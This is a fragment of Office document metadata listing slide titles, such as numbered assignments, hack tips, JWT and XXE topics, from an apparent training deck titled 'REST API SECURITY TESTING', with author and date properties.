      <vt:lpstr>Quick Assignment#2</vt:lpstr>
      <vt:lpstr>Quick Assignment#3</vt:lpstr>
      <vt:lpstr>Quick Assignment#4</vt:lpstr>
      <vt:lpstr>Quick Assignment#5</vt:lpstr>
      <vt:lpstr>Quick Assignment#6</vt:lpstr>
      <vt:lpstr>Quick Assignment#7</vt:lpstr>
      <vt:lpstr>HACK-TIP#1</vt:lpstr>
      <vt:lpstr>HACK-TIP#2</vt:lpstr>
      <vt:lpstr>HACK-TIP#3</vt:lpstr>
      <vt:lpstr>HACK-TIP#4</vt:lpstr>
      <vt:lpstr>HACK-TIP#5</vt:lpstr>
      <vt:lpstr>HACK-TIP#6</vt:lpstr>
      <vt:lpstr>HACK-TIP#7</vt:lpstr>
      <vt:lpstr>Quick Assignment#7</vt:lpstr>
      <vt:lpstr>Quick Assignment#8</vt:lpstr>
      <vt:lpstr>Quick Assignment#9</vt:lpstr>
      <vt:lpstr>Quick Assignment#10</vt:lpstr>
      <vt:lpstr>Quick Assignment#11</vt:lpstr>
      <vt:lpstr>Vulnerability Scanner applications</vt:lpstr>
      <vt:lpstr>Quick Assignment#1</vt:lpstr>
      <vt:lpstr>False Positives &amp; False Negatives</vt:lpstr>
      <vt:lpstr>Find RESTful API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Find API vulnerabilities</vt:lpstr>
      <vt:lpstr>Assignment#0</vt:lpstr>
      <vt:lpstr>Assignment#1</vt:lpstr>
      <vt:lpstr>Assignment#2</vt:lpstr>
      <vt:lpstr>Assignment#3</vt:lpstr>
      <vt:lpstr>Assignment#4</vt:lpstr>
      <vt:lpstr>Assignment#5</vt:lpstr>
      <vt:lpstr>Assignment#6</vt:lpstr>
      <vt:lpstr>Assignment#7</vt:lpstr>
      <vt:lpstr>Assignment#8</vt:lpstr>
      <vt:lpstr>Assignment#9</vt:lpstr>
      <vt:lpstr>Assignment#10</vt:lpstr>
      <vt:lpstr>Assignment#11</vt:lpstr>
      <vt:lpstr>Assignment#12</vt:lpstr>
      <vt:lpstr>Assignment#13</vt:lpstr>
      <vt:lpstr>Assignment#14</vt:lpstr>
      <vt:lpstr>Assignment#15</vt:lpstr>
      <vt:lpstr>Assignment#16</vt:lpstr>
      <vt:lpstr>Assignment#17</vt:lpstr>
      <vt:lpstr>Assignment#18</vt:lpstr>
      <vt:lpstr>Assignment#19a</vt:lpstr>
      <vt:lpstr>Assignment#19b</vt:lpstr>
      <vt:lpstr>JWT – JSON WEB TOKENS</vt:lpstr>
      <vt:lpstr>JWT – JSON WEB TOKENS</vt:lpstr>
      <vt:lpstr>Assignment#20</vt:lpstr>
      <vt:lpstr>Burp Extensiosn</vt:lpstr>
      <vt:lpstr>Assignment#21</vt:lpstr>
      <vt:lpstr>XML XXE Vulnerability</vt:lpstr>
      <vt:lpstr>Assignment#22a</vt:lpstr>
      <vt:lpstr>Assignment#22b</vt:lpstr>
      <vt:lpstr>Assignment#23</vt:lpstr>
      <vt:lpstr>Assignment#24a</vt:lpstr>
      <vt:lpstr>Assignment#24b</vt:lpstr>
      <vt:lpstr>Assignment#24c</vt:lpstr>
      <vt:lpstr>Assignment#25a</vt:lpstr>
      <vt:lpstr>Assignment#25b</vt:lpstr>
      <vt:lpstr>Assignment#25b</vt:lpstr>
      <vt:lpstr>Assignment#26</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REST API SECURITY TESTING</dc:title>
  <dc:creator>Kiran Gopisetty</dc:creator>
  <cp:lastModifiedBy>IQT</cp:lastModifiedBy>
  <cp:revision>161</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-09T04:36:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-23T05:36:32Z</dcterms:modified>
</cp:coreProperties>
</file>